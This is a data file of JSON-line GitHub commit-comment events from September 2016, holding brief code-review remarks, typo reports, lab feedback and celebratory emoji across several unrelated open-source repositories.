{"id":"4642792918","type":"CommitCommentEvent","actor":{"login":"gromakovsky"},"repo":{"name":"serokell/time-warp"},"payload":{"comment":{"id":19239361,"position":88,"line":75,"path":"src/Control/TimeWarp/Rpc/MsgPackRpc.hs","commit_id":"3108f0bfb4d3c6b07c5c64b7c78a961f0b8baf44","created_at":"2016-09-30T11:01:03Z","updated_at":"2016-09-30T11:01:03Z","body":"There is `catches` function, maybe it makes sense to use it."}},"created_at":"2016-09-30T11:01:03Z"}
{"id":"4642793078","type":"CommitCommentEvent","actor":{"login":"AlexCSilva"},"repo":{"name":"eternalcodes/EternalJK"},"payload":{"comment":{"id":19239362,"position":null,"line":null,"path":null,"commit_id":"9553fbf7d79c8226b6c844b8e9c064d27b5e4785","created_at":"2016-09-30T11:01:05Z","updated_at":"2016-09-30T11:01:05Z","body":"only just renamed it? :P"}},"created_at":"2016-09-30T11:01:05Z"}
{"id":"4642793996","type":"CommitCommentEvent","actor":{"login":"jez9999"},"repo":{"name":"jue89/node-systemd-journald"},"payload":{"comment":{"id":19239366,"position":15,"line":13,"path":"src/journal_send.cc","commit_id":"c6463293ce36602109b43de4d0a2629cc1780bcd","created_at":"2016-09-30T11:01:15Z","updated_at":"2016-09-30T11:01:15Z","body":"Using: `\"\" #x` here is probably a good idea as it may be needed to coerce some preprocessors into treating it as a string."}},"created_at":"2016-09-30T11:01:15Z"}
{"id":"4642797601","type":"CommitCommentEvent","actor":{"login":"jez9999"},"repo":{"name":"jue89/node-systemd-journald"},"payload":{"comment":{"id":19239378,"position":20,"line":18,"path":"src/journal_send.cc","commit_id":"c6463293ce36602109b43de4d0a2629cc1780bcd","created_at":"2016-09-30T11:02:07Z","updated_at":"2016-09-30T11:02:07Z","body":"Should this be `*` instead of `*const`? (Maybe I'm forgetting proper C syntax (I'm pretty rusty at it!))"}},"created_at":"2016-09-30T11:02:07Z"}
{"id":"4642798286","type":"CommitCommentEvent","actor":{"login":"loup99"},"repo":{"name":"loup99/WtWSMS"},"payload":{"comment":{"id":19239379,"position":null,"line":null,"path":null,"commit_id":"dd038562dfdfd2f4b3a44a3e8e2232c064b51540","created_at":"2016-09-30T11:02:16Z","updated_at":"2016-09-30T11:02:16Z","body":"Mouchi, I realised this wasn't a typo (but apparently forgot to remove on entry) http://www.definition-of.com/heresey"}},"created_at":"2016-09-30T11:02:16Z"}
{"id":"4642799182","type":"CommitCommentEvent","actor":{"login":"cupuyc"},"repo":{"name":"ether-camp/ethereum-harmony"},"payload":{"comment":{"id":19239384,"position":17,"line":36,"path":"src/main/java/com/ethercamp/harmony/Application.java","commit_id":"d7ad12e00a78324830b6c45c8673033a280549b8","created_at":"2016-09-30T11:02:30Z","updated_at":"2016-09-30T11:02:30Z","body":"Good point. I think that is acceptable, because Harmony will not be distributed as jar artifact."}},"created_at":"2016-09-30T11:02:30Z"}
{"id":"4642800048","type":"CommitCommentEvent","actor":{"login":"jez9999"},"repo":{"name":"jue89/node-systemd-journald"},"payload":{"comment":{"id":19239386,"position":58,"line":47,"path":"src/journal_send.cc","commit_id":"c6463293ce36602109b43de4d0a2629cc1780bcd","created_at":"2016-09-30T11:02:43Z","updated_at":"2016-09-30T11:02:43Z","body":"`Frist` = typo."}},"created_at":"2016-09-30T11:02:43Z"}
{"id":"4642801804","type":"CommitCommentEvent","actor":{"login":"Traveler59"},"repo":{"name":"Traveler59/test"},"payload":{"comment":{"id":19239393,"position":22,"line":15,"path":"src/script.ts","commit_id":"0a5e24fbfea1b4824ecc362e6c7070aec91e7f4e","created_at":"2016-09-30T11:03:11Z","updated_at":"2016-09-30T11:03:11Z","body":"4 space tabs now everywhere"}},"created_at":"2016-09-30T11:03:11Z"}
{"id":"4642802553","type":"CommitCommentEvent","actor":{"login":"Traveler59"},"repo":{"name":"Traveler59/test"},"payload":{"comment":{"id":19239397,"position":72,"line":37,"path":"src/script.ts","commit_id":"0a5e24fbfea1b4824ecc362e6c7070aec91e7f4e","created_at":"2016-09-30T11:03:24Z","updated_at":"2016-09-30T11:03:24Z","body":"Built-in interface EventTarget does not have method getAttribute() so I had to rewrite this line from\r\n`if(this.currentItem().wine == event.currentTarget.getAttribute(\"data-wine\"))`\r\nfunction now gets chosen option as a parameter"}},"created_at":"2016-09-30T11:03:24Z"}
{"id":"4642802877","type":"CommitCommentEvent","actor":{"login":"Traveler59"},"repo":{"name":"Traveler59/test"},"payload":{"comment":{"id":19239398,"position":12,"line":5,"path":"src/script.ts","commit_id":"0a5e24fbfea1b4824ecc362e6c7070aec91e7f4e","created_at":"2016-09-30T11:03:29Z","updated_at":"2016-09-30T11:03:29Z","body":"Added interface for more stong typization"}},"created_at":"2016-09-30T11:03:29Z"}
{"id":"4642803077","type":"CommitCommentEvent","actor":{"login":"ice1000"},"repo":{"name":"icela/FriceEngine-CSharp"},"payload":{"comment":{"id":19239399,"position":null,"line":null,"path":null,"commit_id":"9074b117d4c0e3575ae5c83e72f67de291aa572d","created_at":"2016-09-30T11:03:32Z","updated_at":"2016-09-30T11:03:32Z","body":"原来你是Indian Mifan"}},"created_at":"2016-09-30T11:03:32Z"}
{"id":"4642803377","type":"CommitCommentEvent","actor":{"login":"cupuyc"},"repo":{"name":"ether-camp/ethereum-harmony"},"payload":{"comment":{"id":19239400,"position":17,"line":36,"path":"src/main/java/com/ethercamp/harmony/Application.java","commit_id":"d7ad12e00a78324830b6c45c8673033a280549b8","created_at":"2016-09-30T11:03:37Z","updated_at":"2016-09-30T11:03:37Z","body":"We can aslo pass such property via gradle script."}},"created_at":"2016-09-30T11:03:37Z"}
{"id":"4642804891","type":"CommitCommentEvent","actor":{"login":"binaryoverload"},"repo":{"name":"TheFriendlyDevs/BukkitUtils"},"payload":{"comment":{"id":19239406,"position":52,"line":33,"path":"src/com/thefriendlydevs/bukkitutils/circleequations/Circles.java","commit_id":"208c14abb067bdbe854c2cc5a4e1d439447e3a25","created_at":"2016-09-30T11:04:00Z","updated_at":"2016-09-30T11:04:00Z","body":"TBH i didn't actually write the circle code so I don't know how it works :P If you fork this and make the improvement that would be helpful @treyzania "}},"created_at":"2016-09-30T11:04:00Z"}
{"id":"4642806576","type":"CommitCommentEvent","actor":{"login":"kacrol"},"repo":{"name":"ViolyS/RayUI_VS"},"payload":{"comment":{"id":19239410,"position":null,"line":null,"path":null,"commit_id":"5996c7a1f60eda64f8de53f44c20fdadd7a9c818","created_at":"2016-09-30T11:04:27Z","updated_at":"2016-09-30T11:04:27Z","body":"團隊副本的debuff不用設置優先級了？我以前beta測試調好的pull的暗夜堡和翡翠的都被改成默認的了嘛。。。"}},"created_at":"2016-09-30T11:04:27Z"}
{"id":"4642807689","type":"CommitCommentEvent","actor":{"login":"geier"},"repo":{"name":"teto/i3pystatus"},"payload":{"comment":{"id":19239414,"position":87,"line":64,"path":"i3pystatus/khal_calendar.py","commit_id":"4b67da27bc0f7a0a39bc879a559e1bbc45ddfe56","created_at":"2016-09-30T11:04:45Z","updated_at":"2016-09-30T11:04:45Z","body":"one way to do it would be passing a list of selected calendar names here, e.g., `khal.cli.build_collection(self.config, ['my calendar', 'my other calendar']) `"}},"created_at":"2016-09-30T11:04:45Z"}
{"id":"4642810800","type":"CommitCommentEvent","actor":{"login":"auser"},"repo":{"name":"GSOinteractive/react-native-firestack"},"payload":{"comment":{"id":19239424,"position":5,"line":22,"path":"ios/Firestack/FirestackAuth.m","commit_id":"ae40fecfffc4a760a94e9ba3cd84599bf54676db","created_at":"2016-09-30T11:05:35Z","updated_at":"2016-09-30T11:05:35Z","body":"Can you update this to use the callback method? Using the `promisify()` function (in the JS side) handles the promise. "}},"created_at":"2016-09-30T11:05:35Z"}
{"id":"4642812145","type":"CommitCommentEvent","actor":{"login":"loup99"},"repo":{"name":"loup99/WtWSMS"},"payload":{"comment":{"id":19239430,"position":null,"line":null,"path":null,"commit_id":"30696d3c2c5f780cd048f3721cc91d65482f41e1","created_at":"2016-09-30T11:05:56Z","updated_at":"2016-09-30T11:05:56Z","body":"I thought about that too, but as it had been like that since start, I figured it might be intentional."}},"created_at":"2016-09-30T11:05:56Z"}
{"id":"4642820895","type":"CommitCommentEvent","actor":{"login":"eregon"},"repo":{"name":"jruby/jruby"},"payload":{"comment":{"id":19239455,"position":12,"line":41,"path":"truffle/src/main/java/org/jruby/truffle/language/globals/GlobalVariables.java","commit_id":"8842dec1470a55f0b1169efd76840ddff3654923","created_at":"2016-09-30T11:08:11Z","updated_at":"2016-09-30T11:08:11Z","body":"Why should we avoid them? Startup time?\r\nI would think they compile fine under Graal as well."}},"created_at":"2016-09-30T11:08:11Z"}
{"id":"4642821918","type":"CommitCommentEvent","actor":{"login":"jez9999"},"repo":{"name":"jue89/node-systemd-journald"},"payload":{"comment":{"id":19239457,"position":5,"line":4,"path":"test/mocks/journal_send.js","commit_id":"c6463293ce36602109b43de4d0a2629cc1780bcd","created_at":"2016-09-30T11:08:27Z","updated_at":"2016-09-30T11:08:27Z","body":"It seems to me like this is no longer mocking the C++.  The C++ doesn't store priority as an int, it adds the `PRIORITY` field."}},"created_at":"2016-09-30T11:08:27Z"}
{"id":"4642825164","type":"CommitCommentEvent","actor":{"login":"alexzatsepin"},"repo":{"name":"mapsme/omim"},"payload":{"comment":{"id":19239467,"position":33,"line":357,"path":"android/src/com/mapswithme/util/UiUtils.java","commit_id":"5f44d29d74ed1cf22778782e00f537ae4d86e54a","created_at":"2016-09-30T11:09:17Z","updated_at":"2016-09-30T11:09:17Z","body":"забыл переименовать galleryRect во viewRect"}},"created_at":"2016-09-30T11:09:17Z"}
{"id":"4642825542","type":"CommitCommentEvent","actor":{"login":"parthivgls"},"repo":{"name":"odoo/odoo"},"payload":{"comment":{"id":19239468,"position":null,"line":null,"path":null,"commit_id":"76c443eda331b75bf5dfa7ec22b8eb22e1084343","created_at":"2016-09-30T11:09:24Z","updated_at":"2016-09-30T11:09:24Z","body":":metal:"}},"created_at":"2016-09-30T11:09:24Z"}
{"id":"4642826912","type":"CommitCommentEvent","actor":{"login":"jue89"},"repo":{"name":"jue89/node-systemd-journald"},"payload":{"comment":{"id":19239470,"position":20,"line":18,"path":"src/journal_send.cc","commit_id":"c6463293ce36602109b43de4d0a2629cc1780bcd","created_at":"2016-09-30T11:09:46Z","updated_at":"2016-09-30T11:09:46Z","body":"As far as I remeber:\r\nconst char -> The data in memory is immutable\r\n*const -> The pointer itself is immutable"}},"created_at":"2016-09-30T11:09:46Z"}
{"id":"4642835219","type":"CommitCommentEvent","actor":{"login":"rahulpandeygwl"},"repo":{"name":"rahulpandeygwl/rahulmaven"},"payload":{"comment":{"id":19239490,"position":null,"line":null,"path":null,"commit_id":"3491aa6a9772aa738997c34868c8e3cee0eb50ff","created_at":"2016-09-30T11:11:43Z","updated_at":"2016-09-30T11:11:43Z","body":"MYP-1"}},"created_at":"2016-09-30T11:11:43Z"}
{"id":"4642835247","type":"CommitCommentEvent","actor":{"login":"jue89"},"repo":{"name":"jue89/node-systemd-journald"},"payload":{"comment":{"id":19239491,"position":15,"line":13,"path":"src/journal_send.cc","commit_id":"c6463293ce36602109b43de4d0a2629cc1780bcd","created_at":"2016-09-30T11:11:44Z","updated_at":"2016-09-30T11:11:44Z","body":"Ok. I've never done this before. Thanks for your explanation."}},"created_at":"2016-09-30T11:11:44Z"}
{"id":"4642836833","type":"CommitCommentEvent","actor":{"login":"annapirova"},"repo":{"name":"Lebed71/mp2-lab1-set"},"payload":{"comment":{"id":19239494,"position":null,"line":null,"path":null,"commit_id":"91fb17836fce0c6fee62ce193126d1bf1e1f3ca7","created_at":"2016-09-30T11:12:08Z","updated_at":"2016-09-30T11:12:08Z","body":"(*this). можно не писать. Компилятору и так понятно, какой это объект"}},"created_at":"2016-09-30T11:12:08Z"}
{"id":"4642837451","type":"CommitCommentEvent","actor":{"login":"mathiasbynens"},"repo":{"name":"sindresorhus/ponyfill"},"payload":{"comment":{"id":19239497,"position":14,"line":51,"path":"readme.md","commit_id":"0ab04b9be348218dfc292187571d01b77b1c5b90","created_at":"2016-09-30T11:12:18Z","updated_at":"2016-09-30T11:12:18Z","body":"`s/need/needs/`"}},"created_at":"2016-09-30T11:12:18Z"}
{"id":"4642839607","type":"CommitCommentEvent","actor":{"login":"mathiasbynens"},"repo":{"name":"sindresorhus/ponyfill"},"payload":{"comment":{"id":19239500,"position":14,"line":51,"path":"readme.md","commit_id":"0ab04b9be348218dfc292187571d01b77b1c5b90","created_at":"2016-09-30T11:12:52Z","updated_at":"2016-09-30T11:12:52Z","body":"> If the user really need to be able to use the native API when available for some reason, though strongly discouraged, you could suggest doing the following on their own risk: […]\r\n\r\nWhy is this here? I just wouldn’t mention it at all."}},"created_at":"2016-09-30T11:12:52Z"}
{"id":"4642840025","type":"CommitCommentEvent","actor":{"login":"jaa-odoo"},"repo":{"name":"odoo/odoo"},"payload":{"comment":{"id":19239501,"position":null,"line":null,"path":null,"commit_id":"76c443eda331b75bf5dfa7ec22b8eb22e1084343","created_at":"2016-09-30T11:12:55Z","updated_at":"2016-09-30T11:12:55Z","body":"hooray"}},"created_at":"2016-09-30T11:12:55Z"}
{"id":"4642840152","type":"CommitCommentEvent","actor":{"login":"smowton"},"repo":{"name":"cristina-david/cbmc"},"payload":{"comment":{"id":19239502,"position":null,"line":null,"path":null,"commit_id":"a77e85731fbf49d28d1619557fb49a107f0682be","created_at":"2016-09-30T11:12:59Z","updated_at":"2016-09-30T11:12:59Z","body":"Looks good!"}},"created_at":"2016-09-30T11:12:59Z"}
{"id":"4642840943","type":"CommitCommentEvent","actor":{"login":"TaskClusterRobot"},"repo":{"name":"mozilla/example-addon-repo"},"payload":{"comment":{"id":19239506,"position":null,"line":null,"path":null,"commit_id":"1f5956859dc5d34e88edcf8172452eecf22bfc44","created_at":"2016-09-30T11:13:13Z","updated_at":"2016-09-30T11:13:13Z","body":"TaskCluster-GitHub: https://tools.taskcluster.net/task-graph-inspector/#I_fVpFDjSRqrJVquuVD_NA"}},"created_at":"2016-09-30T11:13:13Z"}
{"id":"4642845692","type":"CommitCommentEvent","actor":{"login":"jez9999"},"repo":{"name":"jue89/node-systemd-journald"},"payload":{"comment":{"id":19239512,"position":20,"line":18,"path":"src/journal_send.cc","commit_id":"c6463293ce36602109b43de4d0a2629cc1780bcd","created_at":"2016-09-30T11:14:28Z","updated_at":"2016-09-30T11:14:28Z","body":"OK I didn't know that."}},"created_at":"2016-09-30T11:14:28Z"}
{"id":"4642846006","type":"CommitCommentEvent","actor":{"login":"InfinityRaider"},"repo":{"name":"InfinityRaider/AgriCraft"},"payload":{"comment":{"id":19239513,"position":7,"line":27,"path":"src/main/java/com/infinityraider/agricraft/utility/CustomWoodType.java","commit_id":"2fab754b4b6cf5d264a8e6e5539b9379b33207f0","created_at":"2016-09-30T11:14:32Z","updated_at":"2016-09-30T11:14:32Z","body":"why though?"}},"created_at":"2016-09-30T11:14:32Z"}
{"id":"4642847479","type":"CommitCommentEvent","actor":{"login":"jue89"},"repo":{"name":"jue89/node-systemd-journald"},"payload":{"comment":{"id":19239517,"position":5,"line":4,"path":"test/mocks/journal_send.js","commit_id":"c6463293ce36602109b43de4d0a2629cc1780bcd","created_at":"2016-09-30T11:14:57Z","updated_at":"2016-09-30T11:14:57Z","body":"Okay. Good point.\r\n(Actually I am not very happy with the testing at all. It just test the JS-side of code, not the C++-side. Atm its kind of okayish since the C++ code is not that much.)"}},"created_at":"2016-09-30T11:14:57Z"}
{"id":"4642848567","type":"CommitCommentEvent","actor":{"login":"hmol"},"repo":{"name":"tommhuth/hackathon-16-fe"},"payload":{"comment":{"id":19239521,"position":null,"line":null,"path":null,"commit_id":"796f56d6975712ba371cbbf7151780a7471f05a5","created_at":"2016-09-30T11:15:13Z","updated_at":"2016-09-30T11:15:13Z","body":"jquery?"}},"created_at":"2016-09-30T11:15:13Z"}
{"id":"4642849695","type":"CommitCommentEvent","actor":{"login":"annapirova"},"repo":{"name":"Lebed71/mp2-lab1-set"},"payload":{"comment":{"id":19239522,"position":null,"line":null,"path":null,"commit_id":"91fb17836fce0c6fee62ce193126d1bf1e1f3ca7","created_at":"2016-09-30T11:15:29Z","updated_at":"2016-09-30T11:15:29Z","body":"TSet::TSet(int mp) : BitField(mp)\r\n  {\r\n\tMaxPower=mp;\r\n\tTBitField a(mp); - это лишнее\r\n\tBitField = a; - это лишнее\r\n  }\r\nконструктор для BitField вызван в первой строке!"}},"created_at":"2016-09-30T11:15:29Z"}
{"id":"4642855929","type":"CommitCommentEvent","actor":{"login":"dasJ"},"repo":{"name":"kennethreitz/autoenv"},"payload":{"comment":{"id":19239534,"position":null,"line":null,"path":null,"commit_id":"42fa56fc14a42ea06e2aea51ac13a52c694cdff4","created_at":"2016-09-30T11:17:06Z","updated_at":"2016-09-30T11:17:06Z","body":"@brandonsturgeon This should have an own major version :shipit: :shipit: "}},"created_at":"2016-09-30T11:17:06Z"}
{"id":"4642856377","type":"CommitCommentEvent","actor":{"login":"brian-brazil"},"repo":{"name":"prometheus/prometheus"},"payload":{"comment":{"id":19239535,"position":16,"line":195,"path":"config/config.go","commit_id":"4520e124403b234ef973636dc4c17e197ad423b4","created_at":"2016-09-30T11:17:14Z","updated_at":"2016-09-30T11:17:14Z","body":"Why is this a list? There's only meant to be one of these."}},"created_at":"2016-09-30T11:17:14Z"}
{"id":"4642862217","type":"CommitCommentEvent","actor":{"login":"DiggyDug"},"repo":{"name":"DiggyDug/1-HTML"},"payload":{"comment":{"id":19239547,"position":null,"line":null,"path":null,"commit_id":"3d0df9b1e650f027f960a0e8dc5c2e75f6a153b3","created_at":"2016-09-30T11:18:45Z","updated_at":"2016-09-30T11:18:45Z","body":"[New Text Document.txt](https://github.com/DiggyDug/1-HTML/files/502776/New.Text.Document.txt)\r\nwew lad"}},"created_at":"2016-09-30T11:18:45Z"}
{"id":"4642863627","type":"CommitCommentEvent","actor":{"login":"annapirova"},"repo":{"name":"Lebed71/mp2-lab1-set"},"payload":{"comment":{"id":19239552,"position":null,"line":null,"path":null,"commit_id":"91fb17836fce0c6fee62ce193126d1bf1e1f3ca7","created_at":"2016-09-30T11:19:09Z","updated_at":"2016-09-30T11:19:09Z","body":"В функциях TSet: if(Elem<MaxPower) - проверить что Elem >= 0"}},"created_at":"2016-09-30T11:19:09Z"}
{"id":"4642865948","type":"CommitCommentEvent","actor":{"login":"lakruzz"},"repo":{"name":"Praqma/reveals"},"payload":{"comment":{"id":19239562,"position":5,"line":418,"path":"metaphors/metaphors.md","commit_id":"a6a64a95a2e2432ca36733bb20a6bcab0a132290","created_at":"2016-09-30T11:19:41Z","updated_at":"2016-09-30T11:19:41Z","body":"Finally that was about time!"}},"created_at":"2016-09-30T11:19:41Z"}
{"id":"4642870906","type":"CommitCommentEvent","actor":{"login":"annapirova"},"repo":{"name":"Lebed71/mp2-lab1-set"},"payload":{"comment":{"id":19239570,"position":null,"line":null,"path":null,"commit_id":"91fb17836fce0c6fee62ce193126d1bf1e1f3ca7","created_at":"2016-09-30T11:20:58Z","updated_at":"2016-09-30T11:20:58Z","body":"В TSet: ioperator+, operator* - надо просто вызвать соответствующие методы для битовых полей, не надо спец. процедуры писать."}},"created_at":"2016-09-30T11:20:58Z"}
{"id":"4642872671","type":"CommitCommentEvent","actor":{"login":"eXPeRi91"},"repo":{"name":"ReinsCoreWotlk/Core"},"payload":{"comment":{"id":19239574,"position":null,"line":null,"path":null,"commit_id":"517823610c09ea3abde2102b486eb7625c7b3b29","created_at":"2016-09-30T11:21:26Z","updated_at":"2016-09-30T11:21:26Z","body":"This Core is not for Private Server's, it's for me to doing some shits around :D "}},"created_at":"2016-09-30T11:21:26Z"}
{"id":"4642875830","type":"CommitCommentEvent","actor":{"login":"annapirova"},"repo":{"name":"Lebed71/mp2-lab1-set"},"payload":{"comment":{"id":19239583,"position":null,"line":null,"path":null,"commit_id":"91fb17836fce0c6fee62ce193126d1bf1e1f3ca7","created_at":"2016-09-30T11:22:16Z","updated_at":"2016-09-30T11:22:16Z","body":"В TSet все конструкторы поправить"}},"created_at":"2016-09-30T11:22:16Z"}
{"id":"4642878252","type":"CommitCommentEvent","actor":{"login":"van562"},"repo":{"name":"andreaiacono/OpenCVDemo"},"payload":{"comment":{"id":19239589,"position":null,"line":null,"path":null,"commit_id":"e681aea13d35a2f9a0d3b12c1fb175a639813f2b","created_at":"2016-09-30T11:22:56Z","updated_at":"2016-09-30T11:22:56Z","body":"Hey Andrea,\r\nMy question is how do I get start coding in face recognition using neural network.  I'm doing this for my senior project. I  want this  project to be small. Where should I start for a beginner?"}},"created_at":"2016-09-30T11:22:56Z"}
{"id":"4642880151","type":"CommitCommentEvent","actor":{"login":"ifdog"},"repo":{"name":"icela/FriceEngine-CSharp"},"payload":{"comment":{"id":19239591,"position":null,"line":null,"path":null,"commit_id":"9074b117d4c0e3575ae5c83e72f67de291aa572d","created_at":"2016-09-30T11:23:25Z","updated_at":"2016-09-30T11:23:25Z","body":"😂Are you OK\r\n\r\n\r\n\r\n发自我的小米手机\r\n在 狰狞的千里冰封 <notifications@github.com>，2016年9月30日 19:04写道：\r\n\r\n原来你是Indian Mifan\r\n\r\n—\r\nYou are receiving this because you authored the thread.\r\nReply to this email directly, view it on GitHub<https://github.com/icela/FriceEngine-CSharp/commit/9074b117d4c0e3575ae5c83e72f67de291aa572d#commitcomment-19239399>, or mute the thread<https://github.com/notifications/unsubscribe-auth/ABcwrg_Kq9ARkBUvGHzipZzX2RWBzYvyks5qvOyEgaJpZM4KK0nt>.\r\n"}},"created_at":"2016-09-30T11:23:25Z"}
{"id":"4642889753","type":"CommitCommentEvent","actor":{"login":"annapirova"},"repo":{"name":"Lebed71/mp2-lab1-set"},"payload":{"comment":{"id":19239614,"position":null,"line":null,"path":null,"commit_id":"91fb17836fce0c6fee62ce193126d1bf1e1f3ca7","created_at":"2016-09-30T11:25:58Z","updated_at":"2016-09-30T11:25:58Z","body":"третий комментарий слетел:\r\nTSet: if Elem < MaxPower - надо проверить и что Elem >= 0"}},"created_at":"2016-09-30T11:25:58Z"}
{"id":"4642889757","type":"CommitCommentEvent","actor":{"login":"ppa-odoo"},"repo":{"name":"odoo/odoo"},"payload":{"comment":{"id":19239613,"position":null,"line":null,"path":null,"commit_id":"76c443eda331b75bf5dfa7ec22b8eb22e1084343","created_at":"2016-09-30T11:25:58Z","updated_at":"2016-09-30T11:25:58Z","body":":tada: :clap:"}},"created_at":"2016-09-30T11:25:58Z"}
{"id":"4642898302","type":"CommitCommentEvent","actor":{"login":"carlossg"},"repo":{"name":"ndeloof/kubernetes-plugin"},"payload":{"comment":{"id":19239623,"position":92,"line":197,"path":"src/main/java/org/csanchez/jenkins/plugins/kubernetes/KubernetesCloud.java","commit_id":"3dd12ef53de3d97b61fa419a49960048a903a494","created_at":"2016-09-30T11:28:12Z","updated_at":"2016-09-30T11:28:12Z","body":"typo? Provisioner"}},"created_at":"2016-09-30T11:28:12Z"}
{"id":"4642899093","type":"CommitCommentEvent","actor":{"login":"jetwhiz"},"repo":{"name":"dokan-dev/dokan-dev.github.io"},"payload":{"comment":{"id":19239625,"position":6,"line":208,"path":"index.html","commit_id":"068ec7e8c6e740ad76b1454aa166d216e15e3bdd","created_at":"2016-09-30T11:28:25Z","updated_at":"2016-09-30T11:28:25Z","body":"Thanks, @Liryna! "}},"created_at":"2016-09-30T11:28:25Z"}
{"id":"4642907377","type":"CommitCommentEvent","actor":{"login":"connormclaud"},"repo":{"name":"agaluzo/lesson2"},"payload":{"comment":{"id":19239636,"position":1,"line":1,"path":"task1.py","commit_id":"15c538a15a5b5deb3bb35471de1ada29dd64bcc2","created_at":"2016-09-30T11:30:33Z","updated_at":"2016-09-30T11:30:33Z","body":"looks good to me\r\n"}},"created_at":"2016-09-30T11:30:33Z"}
{"id":"4642907545","type":"CommitCommentEvent","actor":{"login":"lfaucon"},"repo":{"name":"lfaucon/ada-homeworks"},"payload":{"comment":{"id":19239637,"position":null,"line":null,"path":null,"commit_id":"bd285bad1a107a0b3d1d827b489234675cf1ce71","created_at":"2016-09-30T11:30:35Z","updated_at":"2016-09-30T11:30:35Z","body":"No folder added\r\n`git add -A`"}},"created_at":"2016-09-30T11:30:35Z"}
{"id":"4642908327","type":"CommitCommentEvent","actor":{"login":"connormclaud"},"repo":{"name":"agaluzo/lesson2"},"payload":{"comment":{"id":19239639,"position":1,"line":1,"path":"task2.py","commit_id":"15c538a15a5b5deb3bb35471de1ada29dd64bcc2","created_at":"2016-09-30T11:30:48Z","updated_at":"2016-09-30T11:30:48Z","body":"looks good to me"}},"created_at":"2016-09-30T11:30:48Z"}
{"id":"4642908816","type":"CommitCommentEvent","actor":{"login":"c633"},"repo":{"name":"coniks-sys/coniks-go"},"payload":{"comment":{"id":19239640,"position":null,"line":null,"path":null,"commit_id":"531105f330f8dbfc153d52d3184586a2050dbeda","created_at":"2016-09-30T11:30:55Z","updated_at":"2016-09-30T11:30:55Z","body":"@Liamsi : Is that ready for merging?"}},"created_at":"2016-09-30T11:30:55Z"}
{"id":"4642909021","type":"CommitCommentEvent","actor":{"login":"TaskClusterRobot"},"repo":{"name":"mozilla/example-addon-repo"},"payload":{"comment":{"id":19239641,"position":null,"line":null,"path":null,"commit_id":"48eb2e410569724736e4997f2f8fd8fd9f61a896","created_at":"2016-09-30T11:30:59Z","updated_at":"2016-09-30T11:30:59Z","body":"TaskCluster-GitHub: https://tools.taskcluster.net/task-graph-inspector/#AvAtAsYISR-IDA6AEbdMpw"}},"created_at":"2016-09-30T11:30:59Z"}
{"id":"4642909799","type":"CommitCommentEvent","actor":{"login":"connormclaud"},"repo":{"name":"agaluzo/lesson2"},"payload":{"comment":{"id":19239642,"position":1,"line":1,"path":"task3.py","commit_id":"15c538a15a5b5deb3bb35471de1ada29dd64bcc2","created_at":"2016-09-30T11:31:11Z","updated_at":"2016-09-30T11:31:11Z","body":"looks good to me"}},"created_at":"2016-09-30T11:31:11Z"}
{"id":"4642914838","type":"CommitCommentEvent","actor":{"login":"Liamsi"},"repo":{"name":"coniks-sys/coniks-go"},"payload":{"comment":{"id":19239653,"position":null,"line":null,"path":null,"commit_id":"531105f330f8dbfc153d52d3184586a2050dbeda","created_at":"2016-09-30T11:32:29Z","updated_at":"2016-09-30T11:32:29Z","body":"Yes, indeed. I'll merge it if you are OK with that\n\nAm 30.09.2016 1:30 nachm. schrieb \"Vu Quoc Huy\" <notifications@github.com>:\n\n> @Liamsi <https://github.com/Liamsi> : Is that ready for merging?\n>\n> —\n> You are receiving this because you were mentioned.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/coniks-sys/coniks-go/commit/531105f330f8dbfc153d52d3184586a2050dbeda#commitcomment-19239640>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AHGNZkeBCRQkHSVMedwDBxipBP6RA-EIks5qvPLvgaJpZM4KK_fj>\n> .\n>\n"}},"created_at":"2016-09-30T11:32:29Z"}
{"id":"4642916928","type":"CommitCommentEvent","actor":{"login":"ndeloof"},"repo":{"name":"ndeloof/kubernetes-plugin"},"payload":{"comment":{"id":19239658,"position":92,"line":197,"path":"src/main/java/org/csanchez/jenkins/plugins/kubernetes/KubernetesCloud.java","commit_id":"3dd12ef53de3d97b61fa419a49960048a903a494","created_at":"2016-09-30T11:33:01Z","updated_at":"2016-09-30T11:33:01Z","body":"indeed"}},"created_at":"2016-09-30T11:33:01Z"}
{"id":"4642919053","type":"CommitCommentEvent","actor":{"login":"c633"},"repo":{"name":"coniks-sys/coniks-go"},"payload":{"comment":{"id":19239663,"position":null,"line":null,"path":null,"commit_id":"531105f330f8dbfc153d52d3184586a2050dbeda","created_at":"2016-09-30T11:33:34Z","updated_at":"2016-09-30T11:33:34Z","body":"Yes, LGTM."}},"created_at":"2016-09-30T11:33:34Z"}
{"id":"4642921223","type":"CommitCommentEvent","actor":{"login":"howardchung"},"repo":{"name":"odota/ui"},"payload":{"comment":{"id":19239668,"position":18,"line":11,"path":"src/components/Table/TableHeaderColumn.jsx","commit_id":"7e141d60189856954d47e69b7c5f08154c897dc7","created_at":"2016-09-30T11:34:08Z","updated_at":"2016-09-30T11:34:08Z","body":"node-uuid might work better if collisions are bad.  We are already using this package elsewhere"}},"created_at":"2016-09-30T11:34:08Z"}
{"id":"4642922804","type":"CommitCommentEvent","actor":{"login":"connormclaud"},"repo":{"name":"agaluzo/lesson2"},"payload":{"comment":{"id":19239675,"position":1,"line":1,"path":"task4.py","commit_id":"15c538a15a5b5deb3bb35471de1ada29dd64bcc2","created_at":"2016-09-30T11:34:34Z","updated_at":"2016-09-30T11:34:34Z","body":"behavior is not exactly correct. We should not remove tries from user in case he enters letters which are not in valid letter. E.g. if user enters letter 'a' 5 times we should take only 1 try off"}},"created_at":"2016-09-30T11:34:34Z"}
{"id":"4642924825","type":"CommitCommentEvent","actor":{"login":"howardchung"},"repo":{"name":"odota/ui"},"payload":{"comment":{"id":19239679,"position":38,"line":28,"path":"src/components/Table/TableHeaderColumn.jsx","commit_id":"7e141d60189856954d47e69b7c5f08154c897dc7","created_at":"2016-09-30T11:35:06Z","updated_at":"2016-09-30T11:35:06Z","body":"Do we have HTML we need to set directly?  I know we have it for abilities/items, but not for table headers?"}},"created_at":"2016-09-30T11:35:06Z"}
{"id":"4642924956","type":"CommitCommentEvent","actor":{"login":"dja-odoo"},"repo":{"name":"odoo/odoo"},"payload":{"comment":{"id":19239680,"position":null,"line":null,"path":null,"commit_id":"76c443eda331b75bf5dfa7ec22b8eb22e1084343","created_at":"2016-09-30T11:35:06Z","updated_at":"2016-09-30T11:35:06Z","body":"![giphy](https://cloud.githubusercontent.com/assets/7599908/18990501/efeac3e0-872f-11e6-9ffd-f145bececa56.gif)\r\n"}},"created_at":"2016-09-30T11:35:06Z"}
